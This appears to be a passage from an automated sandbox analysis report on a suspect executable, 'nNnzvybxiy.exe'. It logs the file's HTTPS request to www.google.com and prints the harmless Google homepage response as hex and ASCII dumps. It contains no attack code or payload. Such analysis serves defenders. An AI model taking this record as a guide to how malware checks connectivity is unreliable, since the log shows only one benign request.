                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6f 64 70 2c 20 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74
                                                                                                                                                                                                                            Data Ascii: has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_st
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 32 37 33 2c 33 39 36 2c 31 2c 33 31 2c 33 35 36 2c 32 2c 32 34 31 2c 34 33 2c 31 2c 36 2c 33 31 38 2c 37 30 33 2c 38 31 2c 31 34 32 2c 36 30 32 2c 36 31 2c 31 38 33 2c 39 31 36 2c 32 36 39 2c 32 34 31 2c 33 32 32 2c 32 35 37 2c 32 32 31 2c 32 30 37 39 2c 31 37 31 2c 31 38 32 2c 31 39 34 2c 34 37 32 2c 31 38 39 2c 37 33 31 2c 36 2c 31 30 31 2c 31 37 2c 33 2c 38 30 32 2c 36 38 36 2c 31 33 39 2c 31 2c 31 31 39 33 2c 34 2c 35 2c 36 34 31 2c 36 37 35 2c 31 36 35 2c 33 2c 38 2c 34 31 30 2c 31 36 30 34 2c 31 2c 35 2c 34 2c 34 2c 34 2c 31 36 32 2c 34 32 2c 36 38 35 2c 36 34 37 2c 34 2c 39 2c 32 30 39 2c 35 30 30 2c 34 38 39 2c 37 2c 31 34 34 2c 31 33 2c 31 2c 31 2c 38 30 2c 39 34 34 2c 32 2c 31 2c 32 2c 32 2c 32 2c 33 2c 34 31 2c 31 38 2c 31 34 38 38 2c 31 38 33
                                                                                                                                                                                                                            Data Ascii: 273,396,1,31,356,2,241,43,1,6,318,703,81,142,602,61,183,916,269,241,322,257,221,2079,171,182,194,472,189,731,6,101,17,3,802,686,139,1,1193,4,5,641,675,165,3,8,410,1604,1,5,4,4,4,162,42,685,647,4,9,209,500,489,7,144,13,1,1,80,944,2,1,2,2,2,3,41,18,1488,183
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 6e 28 61 2c 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6d 5b 66 5d 7d 3b 61 2e 73 72 63 3d 64 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 62 3b 72 65 74 75 72 6e 20 72 28 22 22 2c 61 2c 62 29 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 6f 6f 67 6c 65
                                                                                                                                                                                                                            Data Ascii: n(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===void 0?k:b;return r("",a,b)};}).call(this);(function(){google
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 6f 6e 74 3a 31 33 70 78 2f 32 37 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 23 67 62 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 39 39 39 70 78 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e
                                                                                                                                                                                                                            Data Ascii: ont:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:transparent;position:absolute;top:-999px;visibility:hidden
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 61 64 69 75 73 3a 33 70 78 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 3b 2a 6f 70 61 63 69 74 79 3a 31 3b 2a 74 6f 70 3a 2d 32 70 78 3b 2a 6c 65 66 74 3a 2d 35 70 78 3b 2a 72 69 67 68 74 3a 35 70 78 3b 2a 62 6f 74 74 6f 6d 3a 34 70 78 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 22 3b 6f 70 61 63 69 74 79 3a 31 5c 30 2f 3b 74 6f 70 3a 2d 34 70 78 5c 30 2f 3b 6c 65 66 74 3a 2d 36 70 78 5c 30 2f 3b 72 69 67 68 74 3a 35 70 78 5c 30 2f 3b 62 6f 74 74 6f 6d 3a 34 70 78 5c
                                                                                                                                                                                                                            Data Ascii: adius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blur(pixelradius=5)";opacity:1\0/;top:-4px\0/;left:-6px\0/;right:5px\0/;bottom:4px\
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 74 73 61 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 39 70 78 7d 23 67 62 7a 20 2e 67 62 7a 74 2c 23 67 62 7a 20 2e 67 62 67 74 2c 23 67 62 67 20 2e 67 62 67 74 7b 63 6f 6c 6f 72 3a 23 63 63 63 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 62 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 67 62 74 6f 20 2e 67 62 7a 74 20 2e 67 62 74 62 32 2c 2e 67 62 74 6f 20 2e 67 62 67 74 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 30 7d 2e 67 62 74 62 20 2e 67 62 74 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f
                                                                                                                                                                                                                            Data Ascii: ont-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .gbtb2{border-top-width:0}.gbtb .gbts{background:url(https://ssl.gstatic.co
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 72 65 6c 61 74 69 76 65 7d 23 67 62 6d 70 69 2c 23 67 62 6d 70 69 64 2c 23 67 62 6d 70 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69
                                                                                                                                                                                                                            Data Ascii: relative}#gbmpi,#gbmpid,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/i
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 6e 3a 31 30 70 78 20 30 7d 23 67 62 64 34 20 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 32 29 3b 2d 6f 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30
                                                                                                                                                                                                                            Data Ascii: n:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #bebebe;-moz-box-shadow:0 2px 4px rgba(0,0,0,.12);-o-box-shadow:0
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 67 62 70 6d 73 7b 2a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 70 6d 73 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 67 62 6d 70 61 6c 7b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 6d 70 61 6c 61 2c 2e 67 62 6d 70 61 6c 62 7b 66 6f 6e 74 3a 31 33 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 32 30 70 78 20 30 3b 77 68 69 74
                                                                                                                                                                                                                            Data Ascii: gbpms{*white-space:nowrap}.gbpms2{font-weight:bold;white-space:nowrap}#gbmpal{*border-collapse:collapse;border-spacing:0;border:0;margin:0;white-space:nowrap;width:100%}.gbmpala,.gbmpalb{font:13px Arial,sans-serif;line-height:27px;padding:10px 20px 0;whit


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            14192.168.2.749719142.250.186.1004435472C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC40OUTGET / HTTP/1.1
                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1198INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Tue, 14 Jan 2025 11:48:12 GMT
                                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                                            Cache-Control: private, max-age=0
                                                                                                                                                                                                                            Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                                            Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-TWvwfjMZD9xhmNcUKoZfSQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                            Set-Cookie: AEC=AZ6Zc-VS_souyTQihnfvAjiAgGtZsezPbQa_Bk17Ic0yTrEuA33_aElnAA; expires=Sun, 13-Jul-2025 11:48:12 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                                            Set-Cookie: NID=520=p8GSfpkGWsx6AHX1_QICQWde-Yp1rpnDTHDSHQm3M-drCGY3nr8RnMfkkGa45X7tfx4I2OK_RAkP1hyXoj0KD1G6sOtrAbtoxkS1-X-33jIlh3babqk8JTO1xhnu1WXPEaITSliIW18wHcQz59Y66YcrFfYrRmJcrzY1E3AILZIUYfY_USeCAQufuF6mHBi04jsQeBpiAvuWhb0n0g; expires=Wed, 16-Jul-2025 11:48:12 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC192INData Raw: 35 63 39 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20
                                                                                                                                                                                                                            Data Ascii: 5c90<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6f 64 70 2c 20 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61
                                                                                                                                                                                                                            Data Ascii: has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_sta
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 2c 36 2c 33 31 39 2c 35 33 30 2c 31 37 32 2c 38 31 2c 31 34 32 2c 32 35 36 2c 33 34 37 2c 35 37 2c 35 2c 31 30 39 37 2c 38 33 32 2c 31 37 31 2c 38 37 2c 34 39 35 2c 32 35 30 2c 31 39 30 30 2c 32 30 31 2c 31 34 39 39 2c 31 37 2c 33 2c 33 33 39 2c 34 36 32 2c 32 30 39 2c 31 2c 36 31 36 2c 31 2c 31 31 39 33 2c 34 2c 35 2c 36 34 30 2c 36 37 37 2c 31 36 34 2c 33 2c 33 30 37 2c 31 30 37 2c 36 39 32 2c 35 33 35 2c 33 37 39 2c 32 34 2c 31 2c 35 2c 34 2c 34 2c 34 2c 31 34 30 2c 37 32 37 2c 36 34 37 2c 33 2c 34 2c 32 30 38 2c 38 2c 34 39 38 2c 33 30 38 2c 33 33 33 2c 31 33 2c 31 2c 31 2c 38 30 2c 39 34 34 2c 32 2c 31 2c 32 2c 32 2c 32 2c 33 2c 34 31 2c 31 32 35 33 2c 32 35 31 2c 32 37 34 2c 32 33 30 2c 32 32 31 2c 31 2c 37 2c 31 34 37 35 2c 32 32 31 2c 32 31 33 37
                                                                                                                                                                                                                            Data Ascii: ,6,319,530,172,81,142,256,347,57,5,1097,832,171,87,495,250,1900,201,1499,17,3,339,462,209,1,616,1,1193,4,5,640,677,164,3,307,107,692,535,379,24,1,5,4,4,4,140,727,647,3,4,208,8,498,308,333,13,1,1,80,944,2,1,2,2,2,3,41,1253,251,274,230,221,1,7,1475,221,2137
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6d 5b 66 5d 7d 3b 61 2e 73 72 63 3d 64 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 62 3b 72 65 74 75 72 6e 20 72 28 22 22 2c 61 2c 62 29 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 6f 6f 67 6c 65 2e 79 3d 7b 7d 3b 67 6f 6f 67 6c 65 2e 73 79 3d 5b 5d 3b 76 61 72 20 64 3b 28 64 3d 67
                                                                                                                                                                                                                            Data Ascii: :e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===void 0?k:b;return r("",a,b)};}).call(this);(function(){google.y={};google.sy=[];var d;(d=g
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 23 67 62 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 39 39 39 70 78 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 7a 2d 69 6e 64 65 78 3a 39 39 38 3b 72 69 67 68 74 3a 30 7d 2e 67 62 74 6f 20 23 67
                                                                                                                                                                                                                            Data Ascii: f;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:transparent;position:absolute;top:-999px;visibility:hidden;z-index:998;right:0}.gbto #g
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 3b 2a 6f 70 61 63 69 74 79 3a 31 3b 2a 74 6f 70 3a 2d 32 70 78 3b 2a 6c 65 66 74 3a 2d 35 70 78 3b 2a 72 69 67 68 74 3a 35 70 78 3b 2a 62 6f 74 74 6f 6d 3a 34 70 78 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 22 3b 6f 70 61 63 69 74 79 3a 31 5c 30 2f 3b 74 6f 70 3a 2d 34 70 78 5c 30 2f 3b 6c 65 66 74 3a 2d 36 70 78 5c 30 2f 3b 72 69 67 68 74 3a 35 70 78 5c 30 2f 3b 62 6f 74 74 6f 6d 3a 34 70 78 5c 30 2f 7d 2e 67 62 6d 61 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f
                                                                                                                                                                                                                            Data Ascii: geTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blur(pixelradius=5)";opacity:1\0/;top:-4px\0/;left:-6px\0/;right:5px\0/;bottom:4px\0/}.gbma{position:relative;to
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 67 2d 72 69 67 68 74 3a 39 70 78 7d 23 67 62 7a 20 2e 67 62 7a 74 2c 23 67 62 7a 20 2e 67 62 67 74 2c 23 67 62 67 20 2e 67 62 67 74 7b 63 6f 6c 6f 72 3a 23 63 63 63 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 62 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 67 62 74 6f 20 2e 67 62 7a 74 20 2e 67 62 74 62 32 2c 2e 67 62 74 6f 20 2e 67 62 67 74 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 30 7d 2e 67 62 74 62 20 2e 67 62 74 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f
                                                                                                                                                                                                                            Data Ascii: g-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .gbtb2{border-top-width:0}.gbtb .gbts{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 38 5f 33 36 31 35 64 36 34 64 2e 70 6e 67 29 3b 62 61 63 6b 67 72
                                                                                                                                                                                                                            Data Ascii: iw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);backgr
